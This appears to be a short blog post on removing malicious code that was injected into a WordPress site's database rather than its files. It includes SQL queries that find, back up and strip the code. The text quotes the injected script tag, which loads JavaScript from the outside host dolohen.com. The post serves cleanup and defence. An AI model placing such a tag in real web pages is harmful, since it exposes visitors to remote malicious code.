Not all compromised WordPress websites are attacked the same way, and today's case was one of the exceptions. Normally you would find the malicious code in the .htaccess, index.php, header.php or footer.php.

However, people are getting smarter and smarter and are hiding code in places like style.css. Today I found a different type of compromised website: the code was inserted into the database, so normal scans using plugins such as Wordfence would not show any issues, as none of the files were infected. Most file scans compare the core files against the copies from wordpress.org. The next scan would have to be within the database, using phpMyAdmin. After a couple of searches the code was found to be in the wp_posts table.

With a quick find and replace the malicious code was removed.

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2574011" async data-cfasync="false"></script>', '');

The above code removed the malicious code from all posts.
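The search, backup and verification steps around that UPDATE can be run from the phpMyAdmin SQL tab as shown below. This is an added example, not part of the original post; it assumes MySQL or MariaDB and the default wp_ table prefix, and the backup table name wp_posts_cleanup_backup is hypothetical.

```sql
-- Added example; assumes MySQL/MariaDB and the default wp_ table prefix.
-- wp_posts_cleanup_backup is a hypothetical table name.

-- 1. Search: list every post, page or revision that references the injected host.
SELECT ID, post_type, post_status, post_modified
FROM wp_posts
WHERE post_content LIKE '%dolohen.com%'
ORDER BY post_modified DESC;

-- 2. Back up the affected rows before changing anything.
CREATE TABLE wp_posts_cleanup_backup AS
SELECT *
FROM wp_posts
WHERE post_content LIKE '%dolohen.com%';

-- 3. Remove the exact tag, touching only rows that contain the script URL.
UPDATE wp_posts
SET post_content = REPLACE(
      post_content,
      '<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=2574011" async data-cfasync="false"></script>',
      '')
WHERE post_content LIKE '%dolohen.com/apu.php%';

-- 4. Verify: REPLACE only matches the exact string, so any row returned here
--    still holds a variant (different zoneid, attribute order or quoting)
--    that needs to be reviewed by hand. The preview shows the text around the match.
SELECT ID,
       post_type,
       SUBSTRING(post_content,
                 GREATEST(LOCATE('dolohen.com', post_content) - 60, 1),
                 200) AS preview
FROM wp_posts
WHERE post_content LIKE '%dolohen.com%';
```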

 
